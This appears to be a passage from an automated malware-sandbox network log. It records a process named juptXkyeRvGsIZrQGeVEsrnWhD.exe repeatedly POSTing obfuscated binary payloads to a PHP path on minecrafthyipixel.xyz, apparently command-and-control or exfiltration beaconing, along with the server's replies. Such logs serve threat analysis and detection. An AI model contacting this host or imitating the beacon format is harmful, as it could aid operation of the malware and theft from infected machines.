                                                                                                                                    Data Ascii: RZ^T\FTY\^YYWSX\TS_YTUS^^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%]2.!!(\$?3-V*+7_'9 W&) ");;\#?$_-$[. X 5
                                                                                                                                    Apr 19, 2024 13:43:23.374227047 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:23 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=772ewsob7%2Bya0x0czUxknqj18JmvqTxqRR9RYu7Tb49uuYBWAZkIcOBaNI9nnZRgjPEdQOmq5h84PNycKU2%2FC9ex8Bxd2mgkCxilbIPN8tVARx2pDyvVBPbgjusK1k0QNdz%2FiwKkBTc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2f8697953f8-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:23.374291897 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    77192.168.2.449826104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:23.594894886 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:23.699462891 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:23.699786901 CEST2512OUTData Raw: 57 5e 5e 58 5c 41 51 5f 5c 5e 59 59 57 54 58 5e 54 54 5f 57 54 5e 53 59 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W^^X\AQ_\^YYWTX^TT_WT^SY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%_&.T ;/$'85=^'2)(W$+2Q75=;'[#/?.5$[. X )
                                                                                                                                    Apr 19, 2024 13:43:23.961651087 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:23 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MNMGTKahO62PraCR7Za2Bry7xfn5CXi61cZbcUOGl7ke7XJx3%2B5uoxwOCuuQnFok44WsRYlp8zX76rmGAFs6B2i8bIn%2BcDn%2Fh5pKGHujDiCOqMkPUDGwynQWNEHltyhBfqiLGlr4fSA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2fcceee12e5-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:23.961683989 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    78192.168.2.449827104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:24.196310997 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:24.300519943 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:24.300656080 CEST2512OUTData Raw: 57 5c 5e 5d 5c 40 54 5f 5c 5e 59 59 57 5e 58 5a 54 5a 5f 5b 54 5f 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W\^]\@T_\^YYW^XZTZ_[T_S_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%Z%%";8&03Z'+1V=(X2*0&;V7*U+(4",^95$[. X
                                                                                                                                    Apr 19, 2024 13:43:24.563003063 CEST617INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:24 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SK5ppyhK3NEB8R4Wj66B7nQlXUloxu47k%2B2e7UKyLdVRKyreJPgapRfpnNTM0owQDOB1lxWTr17UKzJ9ixnagSokQhBVvTz1VMKSIoxkRbE91KRYqv7VKhcuk%2BoT1Bjp7BNZaFRXcZE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca30099b1b074-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:24.563035011 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    79192.168.2.449828104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:24.788753033 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2504
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:24.893532991 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:24.893687010 CEST2504OUTData Raw: 57 54 5b 5b 59 46 54 5c 5c 5e 59 59 57 57 58 5f 54 5a 5f 59 54 5d 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WT[[YFT\\^YYWWX_TZ_YT]S[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%>5?0 3]==?_'9<T2;&#V)](#/'-$[. X 5
                                                                                                                                    Apr 19, 2024 13:43:25.153681040 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:25 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cmUoFeKtSQTeWHydF12pEAqil%2BqimMXrvLOd3f1x6Qvg2sfPKTp04qgnBll0eazoliVyMEZHyILZ2jfIpB%2Bm0lkkLvysjMxafV5yCpAgaLJNJThJ%2BzrNl4K7Ml3NrzyBAzMh2cdmAB8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca304486eadb2-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:25.153712988 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    80192.168.2.449829104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:25.375885010 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:25.480175018 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:25.480331898 CEST2512OUTData Raw: 52 59 5b 5c 59 40 51 5e 5c 5e 59 59 57 55 58 52 54 54 5f 56 54 5a 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RY[\Y@Q^\^YYWUXRTT_VTZS[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%1>W6'['81><%8%*Q41!>? (_:%$[. X -
                                                                                                                                    Apr 19, 2024 13:43:25.832961082 CEST633INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:25 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Byov4pGUAg3E2DyJqct4u8%2Fwfy%2BEX20Oo%2FsFZUfnCTrDFIm3qC3n7PzS%2B%2BPytYvNRK%2FttfF81%2B9dY0X3xeuNHoc3%2BFa%2BuE37q%2FVTNSzOC8L1OGNAvSavof4t1ZxFtUmSzPmH8kTI5Ao%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca307e9f3ad62-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:25.833009005 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    81192.168.2.449830104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:26.062659979 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:26.167437077 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:26.167572975 CEST2512OUTData Raw: 52 5a 5e 5d 59 43 54 5c 5c 5e 59 59 57 51 58 5b 54 55 5f 59 54 54 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RZ^]YCT\\^YYWQX[TU_YTTSV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&125;7$[$;=U=;7_29(W%8!41*P+;("/<-$[. X =
                                                                                                                                    Apr 19, 2024 13:43:26.432064056 CEST621INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:26 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VTd%2BNT841TkN8L4kiOxiXC45o6ONxJHp0xGtCWyQQAgUVmJQNjqjoA%2BhiiIjI2mbov6NUpcxK2cHOyfsJHKDKqsZPCyRlD2YxsZq3RHtemvowJ6A4%2BMgVOcPb5H%2FehRjO8KGVtNFy3g%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca30c3d576754-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:26.432096958 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    82192.168.2.449831104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:26.679482937 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:26.784126043 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:26.784301043 CEST2512OUTData Raw: 57 59 5e 5d 59 41 51 5f 5c 5e 59 59 57 50 58 58 54 55 5f 5e 54 5c 53 59 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WY^]YAQ_\^YYWPXXTU_^T\SY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%_%%!&0$0;Q=2&;S72*8 3-$[. X
                                                                                                                                    Apr 19, 2024 13:43:27.043272972 CEST623INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:26 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q8PL5SgKOESaVtd63fd84dvNBsRb66KstRTyDIKdtmJF%2FumG2kMeH6GgMLls29%2F1KV2XjujG42YICHDuMnD5ZVorGZi1IX9k%2FwDVJ%2BOwXymkpxIJjJL%2Fg8hDyoQgKYSfAXKuWvp1i48%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3101a478bb6-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:27.043320894 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    83192.168.2.449832104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:27.082515955 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2192
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:27.187092066 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:27.187262058 CEST2192OUTData Raw: 52 59 5b 5c 5c 47 51 5d 5c 5e 59 59 57 55 58 5a 54 56 5f 5a 54 5d 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RY[\\GQ]\^YYWUXZTV_ZT]SW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%^126/&##Z0;=W);42W&-!!5=]4409$[. X -
                                                                                                                                    Apr 19, 2024 13:43:27.454585075 CEST768INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:27 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TA0TAlu%2FQncbBrEGkO9aERi5BzEaSqGPFam3xh9QlDl%2FQ8Zxlmyvohkv1zrzGWo5n2PqjBDthwMqTlr9Nu9X0%2F0Dp0WsTffp2PjY8jYDGLOeAcPT9wsWtdh6zWzgghlVr6nF0NbidOk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3129ac76741-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 39 38 0d 0a 01 15 24 5d 30 26 36 5c 22 2a 24 01 3e 0d 3e 13 28 37 22 05 29 29 31 19 22 3d 30 54 2c 3a 28 10 2b 2b 2e 18 31 33 36 0f 27 2d 37 09 26 20 21 59 00 1a 3a 04 20 2c 3e 01 2e 00 25 59 3c 32 2d 58 20 21 2c 07 3c 07 21 1a 37 38 01 17 3f 10 3d 52 38 2b 20 53 3f 01 3d 5a 2f 19 35 07 20 2b 2c 52 09 12 25 52 2b 06 38 10 27 23 3d 1f 23 0f 38 10 3c 2f 0b 01 27 3b 2f 0e 26 0d 23 05 39 0c 0c 50 26 00 0f 1e 2a 04 0e 1e 20 12 0f 56 32 04 2e 5e 2c 0c 2b 48 05 30 54 57 0d 0a
                                                                                                                                    Data Ascii: 98$]0&6\"*$>>(7"))1"=0T,:(++.136'-7& !Y: ,>.%Y<2-X !,<!78?=R8+ S?=Z/5 +,R%R+8'#=#8</';/&#9P&* V2.^,+H0TW
                                                                                                                                    Apr 19, 2024 13:43:27.454624891 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    84192.168.2.449833104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:27.241437912 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:43:27.345603943 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:27.347742081 CEST2512OUTData Raw: 57 55 5b 59 59 4a 54 5b 5c 5e 59 59 57 55 58 58 54 50 5f 5d 54 5c 53 5a 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WU[YYJT[\^YYWUXXTP_]T\SZ^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%1>*R!<X&#(';=?++^&)$;>Q#==Z48_-%$[. X -
                                                                                                                                    Apr 19, 2024 13:43:27.638834953 CEST623INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:27 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZQgPs5n2CDNsOurWYS9gyvHHxeDZjEc0Yb8hyQw4TyezcEOcJ3m6%2FopkETMneS%2B%2B7f8DX8JkKWPGD82wG3B1dvvreDI6WmieqSO652jghfh0wpmzz%2FvphUEiW1ZLeA5h%2Fe4vvt1Xxbk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca313993ab04e-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:27.638875961 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    85192.168.2.449834104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:27.857820034 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:43:27.965120077 CEST25INHTTP/1.1 100 Continue
